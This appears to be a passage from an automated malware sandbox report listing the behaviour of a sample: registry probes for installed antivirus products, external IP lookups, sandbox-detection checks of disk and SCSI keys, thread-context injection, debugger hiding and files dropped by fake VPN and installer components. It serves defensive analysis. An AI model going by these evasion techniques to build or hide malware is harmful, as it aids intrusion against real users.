\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 100 ipinfo.io 230 ipinfo.io 238 checkip.amazonaws.com 253 ip-api.com 95 ipinfo.io -
Maps connected drives based on registry 3 TTPs 10 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe -
Drops file in System32 directory 17 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\SETC223.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\SETC234.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\SETC235.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660} DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\SETC223.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\SETC234.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{375605f4-2d06-6d47-afe0-9822c3495660}\SETC235.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 5948 mask_svc.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4888 set thread context of 4996 4888 79139104910.exe 107 PID 4996 set thread context of 4448 4996 79139104910.exe 119 PID 5608 set thread context of 3340 5608 ao6Cj5ztMuu8mv6NL8w0bG1N.exe 147 PID 2132 set thread context of 5372 2132 QN1ygxdObN4pGb2PLjmBuRxU.exe 160 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-JG63J.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\WeriseTweaker.exe cpb0ufehxrl.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-17NHO.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-57H7D.tmp vpn.tmp File opened for modification C:\Program Files (x86)\InstallationEngineForIB\Borland.Globalization.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-61JLT.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-DDCS7.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-3GC22.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File opened for modification C:\Program Files (x86)\Delicate-Voice\WinmonProcessMonitor.sys app.exe File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File opened for modification C:\Program Files (x86)\Delicate-Voice\help.txt app.exe File created C:\Program Files (x86)\InstallationEngineForIB\is-EG1Q1.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\InstallationEngineForIB\is-1QT9D.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\InstallationEngineForIB\is-PMCRK.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-3VNHN.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-79LE5.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-25LCL.tmp vpn.tmp File created C:\Program Files (x86)\Delicate-Voice\winamp.exe 7za.exe File created C:\Program Files (x86)\InstallationEngineForIB\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-H4EI5.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-L0AR9.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File created C:\Program Files (x86)\Delicate-Voice\help.txt app.exe File created C:\Program Files (x86)\MaskVPN\is-MLLUF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-B79JG.tmp vpn.tmp File opened for modification C:\Program Files (x86)\InstallationEngineForIB\am805.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-GRD85.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-3SKMN.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-9LCSR.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-8E46N.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\NDP472-KB4054531-Web.exe cpb0ufehxrl.tmp File opened for modification C:\Program Files (x86)\InstallationEngineForIB\jxpiinstall.exe IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\InstallationEngineForIB\ServiceModelInstallRC.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\InstallationEngineForIB\is-CAUGB.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-59QRF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-9GLVT.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-27JKA.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-G3B34.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-7ICTB.tmp vpn.tmp File created C:\Program Files (x86)\InstallationEngineForIB\is-T9UE7.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\InstallationEngineForIB\is-BOA4A.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-22B7P.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-SG57I.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-80MV1.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-R5JD0.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File created C:\Program Files (x86)\Delicate-Voice\winamp-plugins.7z app.exe File opened for modification C:\Program Files (x86)\Delicate-Voice\winamp-plugins.7z app.exe File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-607I9.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-GD25H.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-PA7VL.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-2U9DT.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\unins000.dat cpb0ufehxrl.tmp -
Drops file in Windows directory 18 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new timeout.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new timeout.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new 18346303869.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new 18346303869.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QN1ygxdObN4pGb2PLjmBuRxU.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ao6Cj5ztMuu8mv6NL8w0bG1N.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key opened 